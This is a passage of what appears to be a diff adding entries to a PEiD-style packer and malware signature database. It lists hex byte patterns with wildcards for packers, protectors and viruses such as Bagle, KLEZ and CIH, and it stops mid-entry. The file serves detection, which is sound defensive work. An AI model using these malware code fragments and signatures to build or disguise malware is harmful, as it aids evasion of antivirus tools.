+signature = E8 ?? ?? ?? ?? 5E 83 C6 ?? AD 89 C7 AD 89 C1 AD 30 07 47 E2 ?? AD FF E0 C3
+ep_only = true
+
+[UPXcrypter -> archphase/NWC]
+signature = BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00
+ep_only = true
+
+[UPXFreak v0.1 (Borland Delphi) -> HMX0101]
+signature = BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00
+ep_only = true
+
+[UPXFreak v0.1 (Borland Delphi) -> HMX0101]
+signature = BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00
+ep_only = true
+
+[UPXFreak V0.1 -> HMX0101]
+signature = BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00
+ep_only = true
+
+[UPXShit 0.06]
+signature = B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF
+ep_only = true
+
+[USERNAME v3.00]
+signature = FB 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 8C C8 2B C1 8B C8 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 33 C0 8E D8 06 0E 07 FC 33 F6
+ep_only = true
+
+[USSR 0.31 - by Spirit]
+signature = E8 00 00 00 00 5D 83 C5 12 55 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 8C C9 30 C9 E3 01 C3 BE 32 ?? ?? ?? B0 ?? 30 06 8A 06 46 81 FE 00 ?? ?? ?? 7C F3
+ep_only = false
+
+[VBOX v4.2 MTE]
+signature = 8C E0 0B C5 8C E0 0B C4 03 C5 74 00 74 00 8B C5
+ep_only = true
+
+[VBOX v4.3 - v4.6]
+signature = 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5
+ep_only = false
+
+[VBOX v4.3 - v4.6]
+signature = ?? ?? ?? ?? 90 03 C4 33 C4 33 C5 2B C5 33 C5 8B C5 ?? ?? 2B C5 48 ?? ?? 0B C0 86 E0 8C E0 ?? ?? 8C E0 86 E0 03 C4 40
+ep_only = false
+
+[VcAsm Protector -> VcAsm]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3
+ep_only = true
+
+[VcAsm Protector V1.0X-> VcAsm]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00
+ep_only = true
+
+[Vcasm Protector V1.X -> vcasm]
+signature = EB ?? 5B 56 50 72 6F 74 65 63 74 5D
+ep_only = true
+
+[Vcasm-Protector 1.0]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83
+ep_only = true
+
+[Vcasm-Protector 1.0e -> vcasm]
+signature = EB 0A 5B 56 50 72 6F 74 65 63 74 5D
+ep_only = true
+
+[Vcasm-Protector 1.1 - 1.2 -> vcasm]
+signature = EB 0B 5B 56 50 72 6F 74 65 63 74 5D
+ep_only = true
+
+[vfp&exeNc V5.00 -> Wang JianGuo]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC
+ep_only = true
+
+[vfp&exeNc v6.00 -> Wang JianGuo]
+signature = 60 E8 01 00 00 00 63 58 E8 01 00 00 00 7A 58 2D 0D 10 40 00 8D 90 C1 10 40 00 52 50 8D 80 49 10 40 00 5D 50 8D 85 65 10 40 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC
+ep_only = true
+
+[Video-Lan-Client]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF
+ep_only = true
+
+[Video-Lan-Client -> (UnknownCompiler)]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Virogen Crypt v0.75]
+signature = 9C 55 E8 EC 00 00 00 87 D5 5D 60 87 D5 80 BD 15 27 40 00 01
+ep_only = true
+
+[Virogen`s PE Shrinker v0.14]
+signature = 9C 55 E8 ?? ?? ?? ?? 87 D5 5D 60 87 D5 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 57 56 AD 0B C0 74
+ep_only = true
+
+[VIRUS - I-Worm.Bagle]
+signature = 6A 00 E8 95 01 00 00 E8 9F E6 FF FF 83 3D 03 50 40 00 00 75 14 68 C8 AF 00 00 E8 01 E1 FF FF 05 88 13 00 00 A3 03 50 40 00 68 5C 57 40 00 68 F6 30 40 00 FF 35 03 50 40 00 E8 B0 EA FF FF E8 3A FC FF FF 83 3D 54 57 40 00 00 74 05 E8 F3 FA FF FF 68 E8 03 00
+ep_only = false
+
+[VIRUS - I-Worm.Hybris]
+signature = EB 16 A8 54 ?? ?? 47 41 42 4C 4B 43 47 43 ?? ?? ?? ?? ?? ?? 52 49 53 ?? FC 68 4C 70 40 ?? FF 15
+ep_only = false
+
+[VIRUS - I-Worm.KLEZ]
+signature = 55 8B EC 6A FF 68 40 D2 40 ?? 68 04 AC 40 ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 BC D0
+ep_only = false
+
+[VMProtect 0.7x - 0.8 -> PolyTech]
+signature = 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D
+ep_only = false
+
+[VMProtect 1.06..1.07 -> PolyTech]
+signature = 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8
+ep_only = false
+
+[VOB ProtectCD]
+signature = 5F 81 EF ?? ?? ?? ?? BE ?? ?? 40 ?? 8B 87 ?? ?? ?? ?? 03 C6 57 56 8C A7 ?? ?? ?? ?? FF 10 89 87 ?? ?? ?? ?? 5E 5F
+ep_only = true
+
+[Vpacker -> ttui]
+signature = 89 C6 C7 45 E0 01 00 00 00 F7 03 00 00 FF FF 75 18 0F B7 03 50 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 EB 13 53 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 83 C7 04 FF 45 E0 4E 75 C4 8B F3 83 3E 00 75 88 8B 45 E4 8B 40 10 03 45 DC 8B 55 14 83 C2 20 89 02 68 00 80 00 00 6A 00 8B 45 D4 50 FF 55 EC 8B 55 DC 8B 42 3C 03 45 DC 83 C0 04 8B D8 83 C3 14 8D 45 E0 50 6A 40 68 00 10 00 00 52 FF 55 E8 8D 43 60
+ep_only = false
+
+[VProtector -> vcasm]
+signature = 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C
+ep_only = false
+
+[VProtector -> vcasm]
+signature = 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C 00 00 00 00
+ep_only = false
+
+[VProtector -> vcasm]
+signature = 00 00 00 00 55 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 64 69 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 6C 65 61 73 65 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00
+ep_only = false
+
+[VProtector 0.X-1.2X -> vcasm]
+signature = 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3
+ep_only = false
+
+[VProtector 1.0X -> vcasm]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 E8 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 05 00 00
+ep_only = true
+
+[VProtector 1.1A-1.2 -> vcasm]
+signature = 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F 32 30 30 35 5F 33 5F 31 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3
+ep_only = false
+
+[VProtector 1.1X -> vcasm]
+signature = EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3
+ep_only = true
+
+[vprotector 1.2 -> vcasm]
+signature = EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00
+ep_only = true
+
+[vprotector 1.2 -> vcasm]
+signature = EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 E8 05 00 00 00 0F 01 EB 05 E8 EB FB 00 00 83 C4 04 E8 08 00 00 00 0F 01 83 C0
+ep_only = true
+
+[VProtector 1.3X -> vcasm]
+signature = 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 60 8B B4 24 24 00 00 00 8B BC 24 28 00 00 00 FC C6 C2 80 33 DB A4 C6 C3 02 E8 A9 00 00 00 0F 83 F1 FF FF FF 33 C9 E8 9C 00 00 00 0F 83 2D 00 00 00 33 C0 E8 8F 00 00 00 0F 83 37 00 00 00 C6 C3 02 41 C6 C0 10 E8 7D 00 00 00 10 C0 0F 83 F3 FF FF FF
+ep_only = false
+
+[VProtector 1.3X -> vcasm]
+signature = E9 B9 16 00 00 55 8B EC 81 EC 74 04 00 00 57 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 FF FF C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00
+ep_only = true
+
+[VProtector V1.0 [Build 2004.12.13] test! -> vcasm]
+signature = 55 8B EC 6A FF 68 1A 89 40 00 68 56 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50
+ep_only = true
+
+[VProtector V1.0A -> vcasm]
+signature = 55 8B EC 6A FF 68 8A 8E 40 00 68 C6 8E 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50
+ep_only = true
+
+[VProtector V1.0B -> vcasm]
+signature = 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50
+ep_only = true
+
+[VProtector V1.0D -> vcasm]
+signature = 55 8B EC 6A FF 68 CA 31 41 00 68 06 32 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50
+ep_only = true
+
+[VProtector V1.0E -> vcasm]
+signature = EB 0A 5B 56 50 72 6F 74 65 63 74 5D E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00
+ep_only = true
+
+[VProtector V1.1 -> vcasm]
+signature = B8 1A ED 41 00 B9 EC EB 41 00 50 51 E8 74 00 00 00 E8 51 6A 00 00 58 83 E8 10 B9 B3 00 00 00
+ep_only = true
+
+[VProtector V1.1A -> vcasm]
+signature = EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00
+ep_only = true
+
+[Vterminal V1.0X -> Lei Peng]
+signature = E8 00 00 00 00 58 05 ?? ?? ?? ?? 9C 50 C2 04 00
+ep_only = true
+
+[Vx: ACME (Clonewar Mutant)]
+signature = FC AD 3D FF FF 74 20 E6 42 8A C4 E6 42 E4 61 0C 03 E6 61 AD B9 40 1F E2 FE
+ep_only = true
+
+[Vx: ARCV.4]
+signature = E8 00 00 5D 81 ED 06 01 81 FC 4F 50 74 0B 8D B6 86 01 BF 00 01 57 A4 EB 11 1E 06
+ep_only = true
+
+[Vx: August 16th (Iron Maiden)]
+signature = BA 79 02 03 D7 B4 1A CD 21 B8 24 35 CD 21 5F 57 89 9D 4E 02 8C 85 50 02
+ep_only = true
+
+[Vx: Backfont.900]
+signature = E8 ?? ?? B4 30 CD 21 3C 03 ?? ?? B8 ?? ?? BA ?? ?? CD 21 81 FA ?? ?? ?? ?? BA ?? ?? 8C C0 48 8E C0 8E D8 80 ?? ?? ?? 5A ?? ?? 03 ?? ?? ?? 40 8E D8 80 ?? ?? ?? 5A ?? ?? 83
+ep_only = true
+
+[Vx: Caz.1204]
+signature = E8 ?? ?? 5E 83 EE 03 1E 06 B8 FF FF CD 2F 3C 10
+ep_only = true
+
+[Vx: CIH Version 1.2 TTIT (! WIN95CIH !)]
+signature = 55 8D ?? ?? ?? 33 DB 64 87 03 E8 ?? ?? ?? ?? 5B 8D
+ep_only = true
+
+[Vx: Compiler]
+signature = 8C C3 83 C3 10 2E 01 1E ?? 02 2E 03 1E ?? 02 53 1E
+ep_only = true
+
+[Vx: Danish tiny]
+signature = 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21
+ep_only = true
+
+[Vx: Doom.666]
+signature = E8 ?? ?? ?? 5E 83 EE ?? B8 CF 7B CD 21 3D CF 7B ?? ?? 0E 1F 81 C6 ?? ?? BF ?? ?? B9 ?? ?? FC F3 A4 06 1F 06 B8 ?? ?? 50 CB B4 48 BB 2C 00 CD 21
+ep_only = true
+
+[Vx: Eddie.1028]
+signature = E8 ?? ?? 5E FC 83 ?? ?? 81 ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E B8 FE 4B CD 21 81 FF BB 55 ?? ?? 07 ?? ?? ?? 07 B4 49 CD 21 BB FF FF B4 48 CD 21
+ep_only = true
+
+[Vx: Eddie.1530]
+signature = E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? 50 06 56 1E 33 C0 50 1F C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E
+ep_only = true
+
+[Vx: Eddie.1800]
+signature = E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E
+ep_only = true
+
+[Vx: Eddie.2000]
+signature = E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C5 ?? ?? ?? B4 30 CD 21
+ep_only = true
+
+[Vx: Eddie.2100]
+signature = E8 ?? ?? 4F 4F 0E E8 ?? ?? 47 47 1E FF ?? ?? CB E8 ?? ?? 84 C0 ?? ?? 50 53 56 57 1E 06 B4 51 CD 21 8E C3 ?? ?? ?? ?? ?? ?? ?? 8B F2 B4 2F CD 21 AC
+ep_only = true
+
+[Vx: Eddie.based.1745]
+signature = E8 ?? ?? 5E 81 EE ?? ?? FC ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA ?? 8B E6 81 ?? ?? ?? FB ?? 3B ?? ?? ?? ?? ?? 50 06 ?? 56 1E 8B FE 33 C0 ?? 50 8E D8
+ep_only = true
+
+[Vx: Einstein]
+signature = 00 42 CD 21 72 31 B9 6E 03 33 D2 B4 40 CD 21 72 19 3B C1 75 15 B8 00 42
+ep_only = true
+
+[Vx: Explosion.1000]
+signature = E8 ?? ?? 5E 1E 06 50 81 ?? ?? ?? 56 FC B8 21 35 CD 21 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 26 ?? ?? ?? ?? ?? ?? 74 ?? 8C D8 48 8E D8
+ep_only = true
+
+[Vx: FaxFree.Topo]
+signature = FA 06 33 C0 8E C0 B8 ?? ?? 26 ?? ?? ?? ?? 50 8C C8 26 ?? ?? ?? ?? 50 CC 58 9D 58 26 ?? ?? ?? ?? 58 26 ?? ?? ?? ?? 07 FB
+ep_only = true
+
+[Vx: Gotcha.879]
+signature = E8 ?? ?? 5B 81 EB ?? ?? 9C FC 2E ?? ?? ?? ?? ?? ?? ?? 8C D8 05 ?? ?? 2E ?? ?? ?? ?? 50 2E ?? ?? ?? ?? ?? ?? 8B C3 05 ?? ?? 8B F0 BF 00 01 B9 20 00 F3 A4 0E B8 00 01 50 B8 DA DA CD 21
+ep_only = true
+
+[Vx: Grazie.883]
+signature = 1E 0E 1F 50 06 BF 70 03 B4 1A BA 70 03 CD 21 B4 47 B2 00 BE 32 04 CD 21
+ep_only = true
+
+[Vx: GRUNT.2.Family]
+signature = 48 E2 F7 C3 51 53 52 E8 DD FF 5A 5B 59 C3 B9 00 00 E2 FE C3
+ep_only = true
+
+[Vx: GRUNT.4.Family]
